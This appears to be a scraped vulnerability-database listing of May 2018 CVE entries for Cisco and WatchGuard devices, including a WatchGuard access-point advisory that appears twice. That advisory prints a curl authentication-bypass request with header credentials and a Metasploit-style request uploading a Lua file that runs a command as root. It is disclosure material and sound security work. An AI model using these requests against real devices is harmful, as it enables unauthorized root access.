A vulnerability in the implementation of Point-to-Point Tunneling Protocol (PPTP) functionality in Cisco Aironet 1810, 1830, and 1850 Series Access Points could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected access point. An attacker could exploit this vulnerability by initiating a PPTP connection to an affected access point from a device that is registered to the same wireless network as the access point and sending a malicious GRE frame through the data plane of the access point. A successful exploit could allow the attacker to cause the NSS core process on the affected access point to crash, which would cause the access point to reload and result in a DoS condition. This vulnerability affects Cisco Aironet 1810, 1830, and 1850 Series Access Points that are running Cisco Mobility Express Software Release 8.4.100.0, 8.5.103.0, or 8.5.105.0 and are configured as a master, subordinate, or standalone access point. Cisco Bug IDs: CSCvf73890. The vendor has published this vulnerability as Bug ID CSCvf73890. The device may be put into a denial-of-service (DoS) state. Mobility Express Software is a set of management control software running on these access points. This vulnerability is due to insufficient verification by the program. Multiple Cisco Products are prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition
VAR-201805-0507 CVE-2018-0235 Cisco Wireless LAN Controller Input validation vulnerability CVSS V2: 6.1
CVSS V3: 7.4
Severity: HIGH
A vulnerability in the 802.11 frame validation functionality of the Cisco Wireless LAN Controller (WLC) could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation of certain 802.11 management information element frames that an affected device receives from wireless clients. An attacker could exploit this vulnerability by sending a malformed 802.11 management frame to an affected device. A successful exploit could allow the attacker to cause the affected device to reload unexpectedly, resulting in a DoS condition. This vulnerability affects only Cisco Wireless LAN Controllers that are running Cisco Mobility Express Release 8.5.103.0. Cisco Bug IDs: CSCvg07024. The vendor has confirmed this vulnerability and published it as Bug ID CSCvg07024. The device may be put into a denial-of-service (DoS) state. The product provides security policy, intrusion detection and other functions in the wireless LAN. An input validation vulnerability exists in the 802.11 frame verification feature of Cisco WLC, caused by the program failing to perform full input validation
VAR-201805-0491 CVE-2018-0245 Cisco Wireless LAN Controller Information disclosure vulnerability in software CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A vulnerability in the REST API of Cisco 5500 and 8500 Series Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to view system information that under normal circumstances should be prohibited. The vulnerability is due to incomplete input and validation checking mechanisms in the REST API URL request. An attacker could exploit this vulnerability by sending a malicious URL to the REST API. If successful, an exploit could allow the attacker to view sensitive system information. Cisco Bug IDs: CSCvg89442. The vendor has confirmed this vulnerability and published it as Bug ID CSCvg89442. Information may be obtained. REST API is one of the real-time communication APIs
VAR-201805-0244 CVE-2018-10577 Multiple WatchGuard products unrestricted upload vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
An issue was discovered on WatchGuard AP100, AP102, and AP200 devices with firmware before 1.2.9.15, and AP300 devices with firmware before 2.0.0.10. File upload functionality allows any user authenticated on the web interface to upload files containing code to the web root, allowing these files to be executed as root. Multiple WatchGuard products contain an unrestricted upload of dangerous file types vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).

Introduction
============

Multiple vulnerabilities can be chained together in a number of WatchGuard AP products which result in pre-authenticated remote code execution. The vendor has produced a knowledge-base article[1] and announcement[2] regarding these issues. ZX Security would like to commend the prompt response and resolution of these reported issues by the vendor.

Product
=======

Several WatchGuard Access Points running firmware before v1.2.9.15 are affected, including:

* AP100
* AP102
* AP200

The AP300 is also affected by issues 2, 3 and 4 when running firmware before 2.0.0.10. The latest firmware update resolves these issues.

Technical Details
=================

1) Hard-coded credentials
-------------------------

CVE-2018-10575

A hard-coded user exists in /etc/passwd. The vendor has requested the specific password and hash be withheld until users can apply the patch. There is no way for a user of the access point to change this password. An attacker who is aware of this password is able to access the device over SSH and pivot network requests through the device, though they may not run commands as the shell is set to /bin/false.
2) Hidden authentication method in web interface allows for authentication bypass
---------------------------------------------------------------------------------

CVE-2018-10576

The standard authentication method for accessing the webserver involves submitting an HTML form. This uses a username and password separate from the standard Linux based /etc/passwd authentication. An alternative authentication method was identified from reviewing the source code whereby, when the HTTP headers AUTH_USER and AUTH_PASS are set, credentials are instead tested against the standard Linux /etc/passwd file. This allows an attacker to use the hardcoded credentials found previously (see 1. Hard-coded credentials) to gain web access to the device.

An example command that demonstrates this issue is:

curl https://watchguard-ap200/cgi-bin/luci -H "AUTH_USER: admin" -H "AUTH_PASS: [REDACTED]" -k -v

This session allows for complete access to the web interface as an administrator.

3) Hidden "wgupload" functionality allows for file uploads as root and remote code execution
--------------------------------------------------------------------------------------------

CVE-2018-10577

Reviewing the code reveals file upload functionality that is not shown to the user via the web interface. An attacker needs only a serial number (which is displayed to the user when they login to the device through the standard web interface and can be retrieved programmatically) and a valid session.

An example request to demonstrate this issue is:

res = send_request_cgi({
  'method'  => 'POST',
  'uri'     => "/cgi-bin/luci/;#{stok}/wgupload",
  'headers' => {
    'AUTH_USER' => 'admin',
    'AUTH_PASS' => '[REDACTED]',
  },
  'cookie'  => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
  'data'    => "#!/usr/bin/lua
os.execute('touch /code-execution');"
})

An attacker can then visit the URL http://watchguard-ap200/cgi-bin/payload.luci to execute this command (or any other command).

4) Change password functionality incorrectly verifies old password
------------------------------------------------------------------

CVE-2018-10578

The change password functionality within the web interface attempts to verify the old password before setting a new one; however, this is done through AJAX.
An attacker is able to simply modify the JavaScript to avoid this check or perform the POST request manually.

Metasploit Module
=================

ZX Security will be releasing a Metasploit module which automates exploitation of this chain of vulnerabilities. This has been delayed till 30 days after the initial patch was made available to ensure users are able to patch their devices. The module and the hard-coded password will be released on May 14th 2018.

Disclosure Timeline
===================

Vendor notification: April 04, 2018
Vendor response: April 06, 2018
Firmware update released to public: April 13, 2018
Metasploit module release: May 14, 2018

References
==========

[1] https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy
[2] https://www.watchguard.com/wgrd-blog/new-firmware-available-ap100ap102ap200ap300-security-vulnerability-fixes
VAR-201805-0505 CVE-2018-0226 Cisco Aironet Access Point Vulnerabilities related to certificate and password management CVSS V2: 6.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability in the assignment and management of default user accounts for Secure Shell (SSH) access to Cisco Aironet 1800, 2800, and 3800 Series Access Points that are running Cisco Mobility Express Software could allow an authenticated, remote attacker to gain elevated privileges on an affected access point. The vulnerability exists because the Cisco Mobility Express controller of the affected software configures the default SSH user account for an access point to be the first SSH user account that was created for the Mobility Express controller, if an administrator added user accounts directly to the controller instead of using the default configuration or the SSH username creation wizard. Although the user account has read-only privileges for the Mobility Express controller, the account could have administrative privileges for an associated access point. An attacker who has valid user credentials for an affected controller could exploit this vulnerability by using the default SSH user account to authenticate to an affected access point via SSH. A successful exploit could allow the attacker to log in to the affected access point with administrative privileges and perform arbitrary administrative actions. This vulnerability affects the following Cisco products: Aironet 1800 Series Access Points that are running Cisco Mobility Express Software Releases 8.2.121.0 through 8.5.105.0, Aironet 2800 Series Access Points that are running Cisco Mobility Express Software Releases 8.3.102.0 through 8.5.105.0, Aironet 3800 Series Access Points that are running Cisco Mobility Express Software Releases 8.3.102.0 through 8.5.105.0. Cisco Bug IDs: CSCva68116. Cisco Aironet Access Points contain vulnerabilities related to certificate and password management. The vendor has confirmed this vulnerability and published it as Bug ID CSCva68116. Information may be obtained or altered, and service operation may be disrupted (DoS).
Mobility Express Software is a set of management control software running on these access points. Multiple Cisco Products are prone to a remote privilege-escalation vulnerability. A remote attacker can exploit this issue to bypass certain restrictions and gain elevated privileges
VAR-201805-0245 CVE-2018-10578 Multiple WatchGuard products input validation vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on WatchGuard AP100, AP102, and AP200 devices with firmware before 1.2.9.15, and AP300 devices with firmware before 2.0.0.10. Incorrect validation of the "old password" field in the change password form allows an attacker to bypass validation of this field. Multiple WatchGuard products contain an input validation vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). WatchGuard AP100, AP102 and AP200 are different series of indoor wireless access point devices from WatchGuard. A security vulnerability exists in WatchGuard AP100, AP102, AP200, and AP300.

Introduction
============

Multiple vulnerabilities can be chained together in a number of WatchGuard AP products which result in pre-authenticated remote code execution. The vendor has produced a knowledge-base article[1] and announcement[2] regarding these issues. ZX Security would like to commend the prompt response and resolution of these reported issues by the vendor.

Product
=======

Several WatchGuard Access Points running firmware before v1.2.9.15 are affected, including:

* AP100
* AP102
* AP200

The AP300 is also affected by issues 2, 3 and 4 when running firmware before 2.0.0.10. The latest firmware update resolves these issues.

Technical Details
=================

1) Hard-coded credentials
-------------------------

CVE-2018-10575

A hard-coded user exists in /etc/passwd. The vendor has requested the specific password and hash be withheld until users can apply the patch. There is no way for a user of the access point to change this password. An attacker who is aware of this password is able to access the device over SSH and pivot network requests through the device, though they may not run commands as the shell is set to /bin/false.
2) Hidden authentication method in web interface allows for authentication bypass
---------------------------------------------------------------------------------

CVE-2018-10576

The standard authentication method for accessing the webserver involves submitting an HTML form. This uses a username and password separate from the standard Linux based /etc/passwd authentication. An alternative authentication method was identified from reviewing the source code whereby, when the HTTP headers AUTH_USER and AUTH_PASS are set, credentials are instead tested against the standard Linux /etc/passwd file. This allows an attacker to use the hardcoded credentials found previously (see 1. Hard-coded credentials) to gain web access to the device.

An example command that demonstrates this issue is:

curl https://watchguard-ap200/cgi-bin/luci -H "AUTH_USER: admin" -H "AUTH_PASS: [REDACTED]" -k -v

This session allows for complete access to the web interface as an administrator.

3) Hidden "wgupload" functionality allows for file uploads as root and remote code execution
--------------------------------------------------------------------------------------------

CVE-2018-10577

Reviewing the code reveals file upload functionality that is not shown to the user via the web interface. An attacker needs only a serial number (which is displayed to the user when they login to the device through the standard web interface and can be retrieved programmatically) and a valid session.

An example request to demonstrate this issue is:

res = send_request_cgi({
  'method'  => 'POST',
  'uri'     => "/cgi-bin/luci/;#{stok}/wgupload",
  'headers' => {
    'AUTH_USER' => 'admin',
    'AUTH_PASS' => '[REDACTED]',
  },
  'cookie'  => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
  'data'    => "#!/usr/bin/lua
os.execute('touch /code-execution');"
})

An attacker can then visit the URL http://watchguard-ap200/cgi-bin/payload.luci to execute this command (or any other command).
4) Change password functionality incorrectly verifies old password
------------------------------------------------------------------

CVE-2018-10578

The change password functionality within the web interface attempts to verify the old password before setting a new one; however, this is done through AJAX. An attacker is able to simply modify the JavaScript to avoid this check or perform the POST request manually.

Metasploit Module
=================

ZX Security will be releasing a Metasploit module which automates exploitation of this chain of vulnerabilities. This has been delayed till 30 days after the initial patch was made available to ensure users are able to patch their devices. The module and the hard-coded password will be released on May 14th 2018.

Disclosure Timeline
===================

Vendor notification: April 04, 2018
Vendor response: April 06, 2018
Firmware update released to public: April 13, 2018
Metasploit module release: May 14, 2018

References
==========

[1] https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy
[2] https://www.watchguard.com/wgrd-blog/new-firmware-available-ap100ap102ap200ap300-security-vulnerability-fixes
VAR-201805-0497 CVE-2018-0258 Cisco Prime Data Center Network Manager and Prime Infrastructure Path traversal vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the Cisco Prime File Upload servlet affecting multiple Cisco products could allow a remote attacker to upload arbitrary files to any directory of a vulnerable device (aka Path Traversal) and execute those files. This vulnerability affects the following products: Cisco Prime Data Center Network Manager (DCNM) Version 10.0 and later, and Cisco Prime Infrastructure (PI) All versions. Cisco Bug IDs: CSCvf32411, CSCvf81727. The vendor has confirmed this vulnerability and published it as Bug IDs CSCvf32411 and CSCvf81727. Information may be obtained or altered, and service operation may be disrupted (DoS). Multiple Cisco Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue may allow remote attackers to execute arbitrary code. Failed attempts will likely result in denial-of-service conditions. The manager provides multi-protocol management of the network and provides troubleshooting capabilities for switch health and performance
VAR-201805-0496 CVE-2018-0253 Cisco Secure Access Control System Input validation vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the ACS Report component of Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected system. Commands executed by the attacker are processed at the targeted user's privilege level. The vulnerability is due to insufficient validation of the Action Message Format (AMF) protocol. An attacker could exploit this vulnerability by sending a crafted AMF message that contains malicious code to a targeted user. A successful exploit could allow the attacker to execute arbitrary commands on the ACS device. This vulnerability affects all releases of Cisco Secure ACS prior to Release 5.8 Patch 7. Cisco Bug IDs: CSCve69037. The vendor has confirmed this vulnerability and published it as Bug ID CSCve69037. Information may be obtained or altered, and service operation may be disrupted (DoS). Failed exploits will result in denial-of-service conditions. The system can control network access and network device access through the RADIUS and TACACS protocols, respectively. ACS Report is one of the system's report generation components
VAR-201805-0499 CVE-2018-0264 Multiple Cisco products input validation vulnerability CVSS V2: 6.8
CVSS V3: 9.6
Severity: CRITICAL
A vulnerability in the Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) files could allow an unauthenticated, remote attacker to execute arbitrary code on the system of a targeted user. An attacker could exploit this vulnerability by sending the user a link or email attachment with a malicious ARF file and persuading the user to follow the link or open the file. Successful exploitation could allow the attacker to execute arbitrary code on the user's system. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and Cisco WebEx ARF players. The following client builds of Cisco WebEx Business Suite (WBS31 and WBS32), Cisco WebEx Meetings, and Cisco WebEx Meetings Server are affected: Cisco WebEx Business Suite (WBS31) client builds prior to T31.23.4, Cisco WebEx Business Suite (WBS32) client builds prior to T32.12, Cisco WebEx Meetings with client builds prior to T32.12, Cisco WebEx Meeting Server builds prior to 3.0 Patch 1. Cisco Bug IDs: CSCvh85410, CSCvh85430, CSCvh85440, CSCvh85442, CSCvh85453, CSCvh85457. Multiple Cisco products contain an input validation vulnerability. The vendor has confirmed this vulnerability and published it as Bug IDs CSCvh85410, CSCvh85430, CSCvh85440, CSCvh85442, CSCvh85453 and CSCvh85457. Information may be obtained or altered, and service operation may be disrupted (DoS). The WebEx ARF player is one of the players, which is mainly used to play WebEx recording files in ARF format